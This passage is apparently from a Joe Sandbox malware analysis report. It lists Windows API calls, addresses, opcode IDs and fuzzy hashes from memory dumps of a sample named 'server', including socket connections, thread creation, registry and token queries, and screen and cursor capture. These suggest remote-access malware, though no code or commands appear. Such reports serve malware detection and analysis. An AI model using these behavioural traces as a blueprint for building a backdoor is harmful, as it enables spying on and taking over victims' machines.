                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID: gfff
                                • API String ID: 772126777-1553575800
                                • Opcode ID: 91b9fa16a84fe6fcd60e97a3d99e1aed4d20b384f66aba2166986545eee1b3ef
                                • Instruction ID: c7197912ff5fd36304896d9e0e4c3c204ad4e708709a044846b952971cfb3809
                                • Opcode Fuzzy Hash: 91b9fa16a84fe6fcd60e97a3d99e1aed4d20b384f66aba2166986545eee1b3ef
                                • Instruction Fuzzy Hash: CD21E1327046155BE328DA389C45B2BB7E3FBC8760F658229FA06E72D4CEF4EC008654
                                APIs
                                • inet_addr.WS2_32(?), ref: 10005E57
                                • gethostbyname.WS2_32(?), ref: 10005E63
                                • inet_ntoa.WS2_32(?), ref: 10005E8D
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10005EFB
                                • CloseHandle.KERNEL32(00000000), ref: 10005EFE
                                • CreateThread.KERNEL32(00000000,00000000,Function_00005880,00000000,00000000,00000000), ref: 10005F3A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID: gfff
                                • API String ID: 772126777-1553575800
                                • Opcode ID: 2b2e48b9233d71c179e8e4256631f78aef2ad198907d8a616f5f70b0b1f53888
                                • Instruction ID: 4bb7b8ee4ec5a65906e8f0a6ea5f30d081eb742cdef018fe392bcbb4b8c5aab5
                                • Opcode Fuzzy Hash: 2b2e48b9233d71c179e8e4256631f78aef2ad198907d8a616f5f70b0b1f53888
                                • Instruction Fuzzy Hash: A121E1367042555BE328DA389C45B2BB7E2FBC4761F658229FA46E72D0CEF4EC008618
                                APIs
                                • inet_addr.WS2_32(?), ref: 100066F7
                                • gethostbyname.WS2_32(?), ref: 10006703
                                • inet_ntoa.WS2_32(?), ref: 1000672D
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000679B
                                • CloseHandle.KERNEL32(00000000), ref: 1000679E
                                • CreateThread.KERNEL32(00000000,00000000,10006410,00000000,00000000,00000000), ref: 100067DA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID: gfff
                                • API String ID: 772126777-1553575800
                                • Opcode ID: f01e47dce8243ebdbacc13b674b2ed14e172bd6594d26d58a762836b05828d2e
                                • Instruction ID: 58ebadb22f4f2352d4f0c07478b8d6832934a2795fef116bc6cf84ea50f8ad69
                                • Opcode Fuzzy Hash: f01e47dce8243ebdbacc13b674b2ed14e172bd6594d26d58a762836b05828d2e
                                • Instruction Fuzzy Hash: BC21B4367046155BE328DA399C85B1AB7E3FBC8760F658229FA16E72D4CEF4EC048614
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(0000000C,?), ref: 10068AA6
                                • ??2@YAPAXI@Z.MSVCRT(00019018,0000000C,?), ref: 10068ADA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10068B01
                                • CoInitialize.OLE32(00000000), ref: 10068B0B
                                • CreateWindowExA.USER32(00000000,#32770,1007DE30,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10068B2D
                                • ShowWindow.USER32(00000000,00000000), ref: 10068B38
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@CreateWindow$EventInitializeShow
                                • String ID: #32770
                                • API String ID: 1167904864-463685578
                                • Opcode ID: a8919276c058a7dec2df6c51b7871ff0220c943c339c5ac3a0e52b428adf2aba
                                • Instruction ID: c40a7aba82008906b23f1e1996f2c44ea210c5d9a3af39e251ea5516931b2029
                                • Opcode Fuzzy Hash: a8919276c058a7dec2df6c51b7871ff0220c943c339c5ac3a0e52b428adf2aba
                                • Instruction Fuzzy Hash: D8212BB0904B909FD320DF6A8D84A56FBE8FB08740F808D2EE59AD7A00D378A9048F55
                                APIs
                                  • Part of subcall function 10010520: ReleaseDC.USER32(?,?), ref: 1001053A
                                  • Part of subcall function 10010520: GetDesktopWindow.USER32 ref: 10010540
                                  • Part of subcall function 10010520: GetDC.USER32(00000000), ref: 1001054D
                                • GetCursorPos.USER32(?), ref: 1000FF9A
                                • GetCursorInfo.USER32(?), ref: 1000FFBB
                                • DestroyCursor.USER32(?), ref: 1000FFE4
                                • GetTickCount.KERNEL32 ref: 100100D8
                                • Sleep.KERNEL32(00000001), ref: 100100ED
                                • GetTickCount.KERNEL32 ref: 100100EF
                                • GetTickCount.KERNEL32 ref: 100100FC
                                • InterlockedExchange.KERNEL32(?,00000000), ref: 10010100
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CountCursorTick$DesktopDestroyExchangeInfoInterlockedReleaseSleepWindow
                                • String ID:
                                • API String ID: 3294368536-0
                                • Opcode ID: c5f34d767c69b0e8f4653ca02a3eccce7082b20d11c505590905a968b1b8466f
                                • Instruction ID: 7b30b2465e0484a6c358d486dbc3e3e74d89055d9b4a2f1a32c3f10f469ee35a
                                • Opcode Fuzzy Hash: c5f34d767c69b0e8f4653ca02a3eccce7082b20d11c505590905a968b1b8466f
                                • Instruction Fuzzy Hash: 18515E753007459FE724DF28C880A6BB3E6FF88350F144A2DF5868B652DBB1F9858B61
                                APIs
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 1000E06A
                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000), ref: 1000E09C
                                • LocalAlloc.KERNEL32(00000040,?), ref: 1000E0DB
                                • ??2@YAPAXI@Z.MSVCRT(?), ref: 1000E118
                                • RegEnumKeyExA.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 1000E16D
                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000E1B2
                                • RegCloseKey.ADVAPI32(?), ref: 1000E1BF
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@??3@AllocCloseEnumInfoLocalOpenQuery
                                • String ID:
                                • API String ID: 71355648-0
                                • Opcode ID: 1b3f5b42f68fdcce1c58f7bbc302b9c5cda5b5ea1952274546a23c865a8c7550
                                • Instruction ID: 1bdc6b41a68a7066ed18929c9f9129e6b3d940a8bf03ad75385409d59a1399c2
                                • Opcode Fuzzy Hash: 1b3f5b42f68fdcce1c58f7bbc302b9c5cda5b5ea1952274546a23c865a8c7550
                                • Instruction Fuzzy Hash: 314190716083556FE314CF28CC84A6BBBE9EBC8750F048A2DFA49D7240D675DD05CBA2
                                APIs
                                • OpenProcessToken.ADVAPI32(?,00020028,?,?,1007B960,76F90440,00000000), ref: 100116A6
                                • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 100116D5
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 100116E2
                                • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 10011700
                                • LookupAccountSidA.ADVAPI32 ref: 10011740
                                • LookupAccountSidA.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 10011780
                                • GlobalFree.KERNEL32(00000000), ref: 100117B1
                                • CloseHandle.KERNEL32(?), ref: 100117BC
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Token$AccountGlobalInformationLookup$AllocCloseFreeHandleOpenProcess
                                • String ID:
                                • API String ID: 1197180021-0
                                • Opcode ID: cd3f6368fc5de75794a3751305e067986b9434606f0aaa1555814f9806c69931
                                • Instruction ID: aef5199e8c4097825b2e0746fe6a036d64d1b07520511a5969cee2b76a0b1f35
                                • Opcode Fuzzy Hash: cd3f6368fc5de75794a3751305e067986b9434606f0aaa1555814f9806c69931
                                • Instruction Fuzzy Hash: 714182762083456FE714DF64C8C49AFB7E9FBC8354F01092DF68597280D6B5ED488BA2
                                APIs
                                • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401ABD), ref: 00403966
                                • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401ABD), ref: 0040397A
                                • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00401ABD), ref: 004039A6
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401ABD), ref: 004039DE
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00401ABD), ref: 00403A00
                                • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00401ABD), ref: 00403A19
                                • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00401ABD), ref: 00403A2C
                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403A6A
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                • String ID:
                                • API String ID: 1823725401-0
                                • Opcode ID: fdaf88406933dcfd8653669e040d0f2276af1562a5d27b84b999c574dcd3bfdd
                                • Instruction ID: ad9dd923ed9d3c248ceca5dc3862fa0172e5803eec53910c5ff1caad3bb93819
                                • Opcode Fuzzy Hash: fdaf88406933dcfd8653669e040d0f2276af1562a5d27b84b999c574dcd3bfdd
                                • Instruction Fuzzy Hash: A831D4B26042116FD7207F796CC483BBE9CE649346B15063BF592F3280D6794E454BA9
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 10005000
                                • htons.WS2_32 ref: 10005027
                                • inet_addr.WS2_32(1007DD2C), ref: 10005037
                                • socket.WS2_32(00000002,00000001,00000000), ref: 10005066
                                • connect.WS2_32(00000000,?,00000010), ref: 10005072
                                • Sleep.KERNEL32(00000028), ref: 10005076
                                • closesocket.WS2_32(00000000), ref: 10005079
                                • RtlExitUserThread.NTDLL(00000000), ref: 1000508E
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitSleepStartupThreadUserclosesocketconnecthtonsinet_addrsocket
                                • String ID:
                                • API String ID: 3058909470-0
                                • Opcode ID: 0d43decbdbb566f624c2e78acbbe4a05a8f4958255bdb2bec673a0d53eb05e7d
                                • Instruction ID: 902ebb94e04e1c7c5fd66402ba9005c87273360587b7ce246dad50b3abbda6e0
                                • Opcode Fuzzy Hash: 0d43decbdbb566f624c2e78acbbe4a05a8f4958255bdb2bec673a0d53eb05e7d
                                • Instruction Fuzzy Hash: 871170711053A4ABF310AF65CC89B6ABBB9FF49B41F00841EF19887291DBB598048B66
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                • String ID:
                                • API String ID: 1486965892-0
                                • Opcode ID: 4a41479000e2c6dc63f04f288e1a2f889cd3f381eddac7c77dc14844e2b0364b
                                • Instruction ID: e4da530426af2831799a229c98be5beb60846619531619ef35dcfd8c2b457cff
                                • Opcode Fuzzy Hash: 4a41479000e2c6dc63f04f288e1a2f889cd3f381eddac7c77dc14844e2b0364b
                                • Instruction Fuzzy Hash: 5751A875A00544ABEB05DF65CC41BDFB7BEEF85790F00C129F509AB245DB34B90587A1
                                APIs
                                • GetVersionExA.KERNEL32 ref: 10004676
                                • inet_addr.WS2_32(?), ref: 100046A1
                                • gethostbyname.WS2_32(?), ref: 100046AD
                                • inet_ntoa.WS2_32(?), ref: 100046D7
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000474B
                                • CloseHandle.KERNEL32(00000000), ref: 1000474E
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004310,00000000,00000000,00000000), ref: 1000477A
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandleVersiongethostbynameinet_addrinet_ntoa
                                • String ID:
                                • API String ID: 3347725681-0
                                • Opcode ID: c6a6eae582f774ebee1582ccb1dd4bd013eb24fbee5d9ee572dfd0d40f39049d
                                • Instruction ID: df4bb2cff17a4dad36bc039b66e6a0bfb7aaed8d7346e5ccee572720da75d4d5
                                • Opcode Fuzzy Hash: c6a6eae582f774ebee1582ccb1dd4bd013eb24fbee5d9ee572dfd0d40f39049d
                                • Instruction Fuzzy Hash: A93123722443405BF328DB348C84B2A77E6EB85760F62462DF94A972D0CFB8AC44C609
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000000), ref: 1000881C
                                • GetFileSize.KERNEL32(00000000,?,?,?,?,00000000), ref: 1000883B
                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10008844
                                • lstrlen.KERNEL32(?,?,?,00000000), ref: 1000884B
                                • LocalAlloc.KERNEL32(00000040,00000000,?,?,00000000), ref: 10008859
                                • lstrlen.KERNEL32(?,?,?,00000000), ref: 10008887
                                • LocalFree.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 100088AF
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileLocallstrlen$AllocCloseCreateFreeHandleSize
                                • String ID:
                                • API String ID: 2793549963-0
                                • Opcode ID: e25fcf27649b93bfccbddb0c98ffd84884aebec2cb7528cc99923d21b6815ae0
                                • Instruction ID: aba3aad5fd678ceee709943c066d7c1318fba4e8ca5bf8cd350ee25dca26516d
                                • Opcode Fuzzy Hash: e25fcf27649b93bfccbddb0c98ffd84884aebec2cb7528cc99923d21b6815ae0
                                • Instruction Fuzzy Hash: C621E1327003145FE7089A78EC95A6BB6DAEBC8721F44453DFA02C7380EAF5AD09C760
                                APIs
                                • inet_addr.WS2_32(?), ref: 10005588
                                • gethostbyname.WS2_32(?), ref: 10005594
                                • inet_ntoa.WS2_32(?), ref: 100055BE
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000562C
                                • CloseHandle.KERNEL32(00000000), ref: 1000562F
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004310,00000000,00000000,00000000), ref: 10005658
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004BC0,00000000,00000000,00000000), ref: 1000566B
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID:
                                • API String ID: 772126777-0
                                • Opcode ID: 682f85eca88e854ade3a5e1b08e0358e6797b5844f76c8cc76ed74894ed0b74b
                                • Instruction ID: d8acfb67411859da9f326e055f778afd8bf87ba093dd899f6f4e0a5fb8b5cdca
                                • Opcode Fuzzy Hash: 682f85eca88e854ade3a5e1b08e0358e6797b5844f76c8cc76ed74894ed0b74b
                                • Instruction Fuzzy Hash: A321D8727403155BF328DB349C95B1B76E2FBC4761F65462DFA52A72D0CEF4AC048618
                                APIs
                                • inet_addr.WS2_32(?), ref: 10005688
                                • gethostbyname.WS2_32(?), ref: 10005694
                                • inet_ntoa.WS2_32(?), ref: 100056BE
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000572C
                                • CloseHandle.KERNEL32(00000000), ref: 1000572F
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004130,00000000,00000000,00000000), ref: 10005758
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004DC0,00000000,00000000,00000000), ref: 1000576B
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID:
                                • API String ID: 772126777-0
                                • Opcode ID: 3676fb98455793ff73a567f839e21bc22614870c3fd5789fe76a044b48827b80
                                • Instruction ID: 9488327e99ebaf0692ae378b052773dd40b9acca62f8510c4b65027830434a75
                                • Opcode Fuzzy Hash: 3676fb98455793ff73a567f839e21bc22614870c3fd5789fe76a044b48827b80
                                • Instruction Fuzzy Hash: 7F21E4327443156BF324DB349C85B1BB6E2EB84B60F254629FA02AB2D0CEF4AC048618
                                APIs
                                • inet_addr.WS2_32(?), ref: 10005788
                                • gethostbyname.WS2_32(?), ref: 10005794
                                • inet_ntoa.WS2_32(?), ref: 100057BE
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000582C
                                • CloseHandle.KERNEL32(00000000), ref: 1000582F
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004130,00000000,00000000,00000000), ref: 10005858
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004BC0,00000000,00000000,00000000), ref: 1000586B
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID:
                                • API String ID: 772126777-0
                                • Opcode ID: 69e58f35093950da0f615bc0284163a56cc3614a623f534f56f7dfb3f7cc9610
                                • Instruction ID: 5a4b8bc2c2b8071631b041413c90c1d326417705303120385d25498e08fc0dd5
                                • Opcode Fuzzy Hash: 69e58f35093950da0f615bc0284163a56cc3614a623f534f56f7dfb3f7cc9610
                                • Instruction Fuzzy Hash: D121B4727443156BF324DB349C85B1BB6E2EB84B61F254629FA52AB2D0CEF4EC048618
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,10007EAC,00000001), ref: 10008904
                                  • Part of subcall function 100089B0: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,10007EAC,00000001), ref: 100089D4
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
